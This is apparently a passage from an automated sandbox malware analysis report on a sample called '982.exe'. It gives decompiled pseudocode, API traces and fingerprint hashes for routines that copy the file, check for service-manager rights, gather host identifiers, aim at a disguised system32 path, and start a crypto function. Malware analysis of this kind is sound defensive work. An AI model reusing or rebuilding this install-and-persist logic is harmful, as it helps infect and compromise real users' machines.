				_t24 = 0;
				do {
					_t14 =  *(_t24 + 0x416840) & 0x0000ffff;
					_t24 =  &(_t24->nLength);
					 *(_t25 + _t24 - 0x20a) = _t14;
					if(_t14 != 0x5c) {
						goto L8;
					}
					_t16 = GetFileAttributesW( &_v524); // executed
					if(_t16 != 0xffffffff) {
						if((_t16 & 0x00000010) == 0) {
							L6:
							return 0;
						}
						goto L8;
					}
					if(CreateDirectoryW( &_v524, 0) == 0 && GetLastError() != 0xb7) {
						goto L6;
					}
					L8:
				} while ( *(_t24 + 0x416840) != 0);
				goto L9;
			}








                  0x00401016
                  0x00401023
                  0x00401082
                  0x00000000
                  0x00401084
                  0x00401027
                  0x00401029
                  0x00401029
                  0x00401030
                  0x00401033
                  0x0040103e
                  0x00000000
                  0x00000000
                  0x00401047
                  0x00401050
                  0x00401077
                  0x00401071
                  0x00000000
                  0x00401071
                  0x00000000
                  0x00401077
                  0x00401062
                  0x00000000
                  0x00000000
                  0x00401079
                  0x00401079
                  0x00000000

                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                  • GetLastError.KERNEL32 ref: 00401064
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID:
                  • API String ID: 674977465-0
                  • Opcode ID: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction ID: 28d4eda84da1510f6b483daa07369c8cca4f66dd7d324f082ec51ad891a83a22
                  • Opcode Fuzzy Hash: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction Fuzzy Hash: 9601A73580025456DB70AB64DC0CAE773ACEF40325F004A76D8E5E25F1EB7899C6C659
                  Uniqueness

                  Uniqueness Score: 4.65%

                  Function 0040F92D, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 34stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _t1;
				int _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;

				_t24 = __eflags;
				_t20 = __edx;
				_t16 = __ecx;
				_t1 =  *0x415488; // 0x3c4e0000
				 *0x4164e0 = _t1;
				E0040F16B();
				E0040F149();
				E0040F26C();
				E0040F292();
				E0040F3C5(); // executed
				E0040F43E(__ebx); // executed
				E0040F2EE(_t24); // executed
				_t9 = lstrcmpiW("C:\Users\luketaylor\982.exe", 0x416840);
				if(_t9 != 0) {
					E0040F63A(_t16, _t20, __edi, __eflags); // executed
					__eflags =  *0x415f4c;
					if( *0x415f4c == 0) {
						__eflags = 0;
						E00401CC2(0x416840, 0, _t16, 0);
					} else {
						E0040F7A0(); // executed
					}
					__eflags = 1;
					return 1;
				} else {
					return _t9; // executed
				}
			}








                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f933
                  0x0040f938
                  0x0040f93d
                  0x0040f942
                  0x0040f947
                  0x0040f94c
                  0x0040f951
                  0x0040f956
                  0x0040f966
                  0x0040f96e
                  0x0040f972
                  0x0040f977
                  0x0040f97e
                  0x0040f98a
                  0x0040f98e
                  0x0040f980
                  0x0040f980
                  0x0040f980
                  0x0040f997
                  0x0040f999
                  0x0040f971
                  0x0040f971
                  0x0040f971

                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\982.exe,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNELBASE(C:\Users\user\982.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(C:\Users\user\982.exe,C:\Windows\system32\sortedwatched.exe,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteFolderManagerMappingModuleMultiOpenPathServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: C:\Users\user\982.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 2225404385-3515039387
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C84E, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C84E(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				signed int _t6;
				long _t9;
				void* _t12;
				void* _t17;
				signed int _t19;
				void* _t24;

				_t24 = __eflags;
				_t17 = __edi;
				_t12 = __ebx;
				_t6 = GetTickCount();
				_t16 = _t6 % 0xfa0;
				_t19 = _t6 % 0xfa0; // executed
				E0040C493(); // executed
				_t9 = E0040C601(_t24);
				if(_t9 != 0) {
					_t5 = _t19 + 0xfa0; // 0xfa0
					_t9 = WaitForSingleObject( *0x414e6c, _t5);
					while(_t9 == 0x102) {
						_t9 = WaitForSingleObject( *0x414e6c, E0040C78F(_t12, _t16, _t17));
					}
				}
				return _t9;
			}









                  0x0040c84e
                  0x0040c84e
                  0x0040c84e
                  0x0040c856
                  0x0040c863
                  0x0040c865
                  0x0040c867
                  0x0040c86c
                  0x0040c873
                  0x0040c875
                  0x0040c882
                  0x0040c8a1
                  0x0040c89b
                  0x0040c89b
                  0x0040c8a1
                  0x0040c8a9

                  APIs
                  • GetTickCount.KERNEL32(00000000,?,?,0040F111), ref: 0040C856
                    • Part of subcall function 0040C493: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                    • Part of subcall function 0040C493: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                    • Part of subcall function 0040C601: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                    • Part of subcall function 0040C601: SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                    • Part of subcall function 0040C601: ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                    • Part of subcall function 0040C601: ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                    • Part of subcall function 0040C601: CloseHandle.KERNELBASE ref: 0040C677
                  • WaitForSingleObject.KERNEL32(00000FA0), ref: 0040C882
                  • WaitForSingleObject.KERNEL32(00000000), ref: 0040C89B
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                  • String ID:
                  • API String ID: 1052563600-0
                  • Opcode ID: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction ID: c69442cc489c2c4f0668fa5bec6b92153ca26a26e28d5911284e54d6033ab6a8
                  • Opcode Fuzzy Hash: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction Fuzzy Hash: 89E0E532500101DBE7207BB1AC894BA7299EB85312F14C376FC59E22E4DE798D1096EE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F214, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID: C:\Windows\system32
                  • API String ID: 1514166925-2896066436
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.19%

                  Function 0040C78F, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0040C78F(void* __ebx, void* __edx, void* __edi) {
				void* __ecx;
				intOrPtr _t6;
				intOrPtr _t7;
				signed int _t10;
				void* _t15;
				signed int _t21;
				signed int _t23;
				void* _t24;
				void* _t29;
				void* _t32;
				void* _t34;

				_t34 = __edx;
				_t6 =  *0x415484; // 0x0
				_t7 = _t6;
				if(_t7 == 0) {
					E0040632A(__eflags); // executed
					E004076C6(__eflags); // executed
					_t10 = E0040F92D(__ebx, _t29, _t34, __edi, __eflags);
					__eflags = _t10;
					if(_t10 != 0) {
						goto L12;
					} else {
						 *0x415484 = 1;
						goto L11;
					}
				} else {
					_t15 = _t7 - 1;
					if(_t15 == 0) {
						E00408922(__eflags);
						E00408CD5(__eflags);
						E00409BFD(__eflags);
						E0040A2C9(__eflags);
						E0040B6B5(__eflags);
						_push(_t29);
						_t21 = E004060C5();
						_t32 = _t29;
						__eflags = _t21;
						if(_t21 == 0) {
							L12:
							 *0x415484 = 3;
							goto L13;
						} else {
							_push(_t32);
							_t23 = E0040FCD8(E0040FA9B());
							__eflags = _t23;
							if(_t23 == 0) {
								goto L12;
							} else {
								 *0x415484 = 2;
								L11:
								_t2 = GetTickCount() % 0xfa0;
								__eflags = _t2;
								return 0xfa0 + _t2;
							}
						}
					} else {
						_t24 = _t15 - 1;
						if(_t24 == 0) {
							 *0x415484 = 2;
							return E0040C682(__edi, __eflags);
						} else {
							if(_t24 == 1) {
								SetEvent( *0x414e6c);
							}
							L13:
							return 0;
						}
					}
				}
			}














                  0x0040c78f
                  0x0040c790
                  0x0040c795
                  0x0040c798
                  0x0040c80f
                  0x0040c814
                  0x0040c819
                  0x0040c81e
                  0x0040c820
                  0x00000000
                  0x0040c822
                  0x0040c822
                  0x00000000
                  0x0040c822
                  0x0040c79a
                  0x0040c79a
                  0x0040c79b
                  0x0040c7c9
                  0x0040c7ce
                  0x0040c7d3
                  0x0040c7d8
                  0x0040c7dd
                  0x0040c7e2
                  0x0040c7e4
                  0x0040c7ea
                  0x0040c7eb
                  0x0040c7ed
                  0x0040c840
                  0x0040c840
                  0x00000000
                  0x0040c7ef
                  0x0040c7ef
                  0x0040c7f7
                  0x0040c7ff
                  0x0040c801
                  0x00000000
                  0x0040c803
                  0x0040c803
                  0x0040c82c
                  0x0040c839
                  0x0040c839
                  0x0040c83f
                  0x0040c83f
                  0x0040c801
                  0x0040c79d
                  0x0040c79d
                  0x0040c79e
                  0x0040c7b8
                  0x0040c7c8
                  0x0040c7a0
                  0x0040c7a1
                  0x0040c7ad
                  0x0040c7ad
                  0x0040c84a
                  0x0040c84d
                  0x0040c84d
                  0x0040c79e
                  0x0040c79b

                  APIs
                  • SetEvent.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C7AD
                  • GetTickCount.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C82C
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountEventTick
                  • String ID:
                  • API String ID: 180926312-0
                  • Opcode ID: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction ID: be868de2910ec1a5e810c43775452dbe779e15a4cf7b5af956ef61f3f0da2497
                  • Opcode Fuzzy Hash: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction Fuzzy Hash: 3D0196B1514502C9E7147BB5A94A3AB3658AB8031EF10C23FA402B56D3EF3D8454952E
                  Uniqueness

                  Uniqueness Score: 2.98%

                  Function 0040108B, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040108B(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v18;
				struct _SHFILEOPSTRUCTW _v36;
				int _t12;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t19;

				_t18 = __edx;
				_t19 = __ecx;
				memset( &_v36, 0, 0x1e);
				_v36.pFrom = _t19;
				_v36.pTo = _t18;
				_v36.fFlags = 0xe14;
				_t15 = 1;
				_v36.wFunc = 1;
				_t12 = SHFileOperationW( &_v36); // executed
				if(_t12 != 0 || _v18 != _t12) {
					_t15 = 0;
				}
				return _t15;
			}









                  0x00401099
                  0x0040109e
                  0x004010a0
                  0x004010a9
                  0x004010b1
                  0x004010b4
                  0x004010bd
                  0x004010bf
                  0x004010c2
                  0x004010ca
                  0x004010d1
                  0x004010d1
                  0x004010db

                  APIs
                  • memset.NTDLL ref: 004010A0
                  • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?,0040F65D,00416840,00000104), ref: 004010C2
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileOperationmemset
                  • String ID:
                  • API String ID: 1721435463-0
                  • Opcode ID: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction ID: 61758c14e14ea73e7dd5b344baac78daadb18c4dc6455e4bc7b17e4a8dd0dbd3
                  • Opcode Fuzzy Hash: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction Fuzzy Hash: A7F05475E0025C5FDB109FA99C856EFB7BCFB84755F00013BE504F2240E6748A5487A5
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 0040F92D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _t1;
				int _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;

				_t24 = __eflags;
				_t20 = __edx;
				_t16 = __ecx;
				_t1 =  *0x415488; // 0x3c4e0000
				 *0x4164e0 = _t1;
				E0040F16B();
				E0040F149();
				E0040F26C();
				E0040F292();
				E0040F3C5(); // executed
				E0040F43E(__ebx); // executed
				E0040F2EE(_t24); // executed
				_t9 = lstrcmpiW(0x416c50, 0x416840);
				if(_t9 != 0) {
					E0040F63A(_t16, _t20, __edi, __eflags); // executed
					__eflags =  *0x415f4c;
					if( *0x415f4c == 0) {
						__eflags = 0;
						E00401CC2(0x416840, 0, _t16, 0);
					} else {
						E0040F7A0(); // executed
					}
					__eflags = 1;
					return 1;
				} else {
					return _t9; // executed
				}
			}








                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f933
                  0x0040f938
                  0x0040f93d
                  0x0040f942
                  0x0040f947
                  0x0040f94c
                  0x0040f951
                  0x0040f956
                  0x0040f966
                  0x0040f96e
                  0x0040f972
                  0x0040f977
                  0x0040f97e
                  0x0040f98a
                  0x0040f98e
                  0x0040f980
                  0x0040f980
                  0x0040f980
                  0x0040f997
                  0x0040f999
                  0x0040f971
                  0x0040f971
                  0x0040f971

                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,00416C50,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNELBASE(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(00416C50,00416840,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteManagerMappingModuleMultiOpenServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: @hA
                  • API String ID: 260064074-589612155
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C493, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C493() {
				short _v524;
				int _t7;
				intOrPtr* _t8;
				int _t10;

				_t7 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t7 != 0) {
					_t8 =  &_v524;
					if(_v524 == 0) {
						L6:
						_t10 = GetVolumeInformationW( &_v524, 0, 0, 0x415488, 0, 0, 0, 0); // executed
						return _t10;
					}
					while( *_t8 != 0x5c) {
						_t8 = _t8 + 2;
						if( *_t8 != 0) {
							continue;
						}
						goto L6;
					}
					 *((short*)(_t8 + 2)) = 0;
					goto L6;
				}
				return _t7;
			}







                  0x0040c4a8
                  0x0040c4b0
                  0x0040c4b4
                  0x0040c4c1
                  0x0040c4d9
                  0x0040c4eb
                  0x00000000
                  0x0040c4eb
                  0x0040c4c3
                  0x0040c4c9
                  0x0040c4cf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c4d1
                  0x0040c4d5
                  0x00000000
                  0x0040c4d5
                  0x0040c4f4

                  APIs
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectoryInformationVolumeWindows
                  • String ID:
                  • API String ID: 3487004747-0
                  • Opcode ID: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction ID: 6df482a4064c3c314c9bc21c7ed919fd71dc62a834def3a9c54a892a1779e89a
                  • Opcode Fuzzy Hash: d551ca3e1d6bdfe1e2032ad98836d5a1be74920f70889b0d4aca8ac5e3ea59a8
                  • Instruction Fuzzy Hash: 41F0B461840304EADB60AB609C99EF7727CFB90701F04C2BBE446A31A0EA748EC04669
                  Uniqueness

                  Uniqueness Score: 0.11%

                  Function 0040F16B, Relevance: 3.0, APIs: 2, Instructions: 10serviceCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F16B() {
				void* _t1;
				int _t2;

				_t1 = OpenSCManagerW(0, 0, 0xf003f); // executed
				if(_t1 != 0) {
					 *0x415f4c = 1; // executed
					_t2 = CloseServiceHandle(_t1); // executed
					return _t2;
				}
				return _t1;
			}





                  0x0040f174
                  0x0040f17c
                  0x0040f17f
                  0x0040f189
                  0x00000000
                  0x0040f189
                  0x0040f18f

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                  • CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleManagerOpenService
                  • String ID:
                  • API String ID: 1199824460-0
                  • Opcode ID: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction ID: 2df2e35fa660732f6bf37a98dc022a26ca5b34ae0ab37706f3e31856a2e9695e
                  • Opcode Fuzzy Hash: 328b80631a7d1405865ec1f2d27f3b53a49fc41852bb4fe2dd5b1e2aa201f722
                  • Instruction Fuzzy Hash: 36C04CB0340301AEEB749F51DE09BA53998AB44B42F008074A60DE95D5CBF44406DA2D
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 0040F214, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID:
                  • API String ID: 1514166925-0
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Non-executed Functions

                  Function 00404AD4, Relevance: 24.4, APIs: 11, Strings: 2, Instructions: 1626UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00404AD4(int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, signed char* _a12, signed int* _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed char _v56;
				intOrPtr _v60;
				int* _v64;
				signed int _v68;
				int _v72;
				void* _v76;
				intOrPtr _v80;
				signed int _v144;
				signed int _v148;
				void _v212;
				signed int _t759;
				signed int* _t763;
				void* _t764;
				signed int _t769;
				signed int _t770;
				intOrPtr _t771;
				int _t772;
				signed int _t774;
				void* _t775;
				signed int _t782;
				void* _t785;
				signed int* _t786;
				void* _t792;
				intOrPtr _t795;
				signed char* _t813;
				intOrPtr _t815;
				void* _t816;
				signed int _t819;
				intOrPtr _t822;
				signed int _t823;
				signed int _t828;
				signed int _t830;
				signed int _t834;
				unsigned int _t836;
				signed int _t837;
				signed int _t841;
				unsigned int _t843;
				signed int _t846;
				signed int _t849;
				unsigned int _t850;
				signed int _t852;
				signed char _t853;
				signed int _t855;
				signed int _t864;
				signed int _t865;
				signed int _t868;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				void* _t875;
				signed int _t879;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t889;
				char _t890;
				signed int _t894;
				signed int _t900;
				signed int _t902;
				signed char _t908;
				signed int _t910;
				signed int _t913;
				signed int _t915;
				signed int _t919;
				signed int _t920;
				signed int _t922;
				signed int _t926;
				signed int _t934;
				intOrPtr _t937;
				signed int _t939;
				signed int _t941;
				signed int _t948;
				signed int _t960;
				signed int _t962;
				signed char _t968;
				signed int _t970;
				signed int _t972;
				intOrPtr _t988;
				signed int _t989;
				void* _t999;
				signed int _t1004;
				signed int _t1008;
				signed int _t1009;
				signed int _t1011;
				signed int _t1014;
				signed int _t1019;
				signed int _t1029;
				signed int _t1031;
				signed char _t1037;
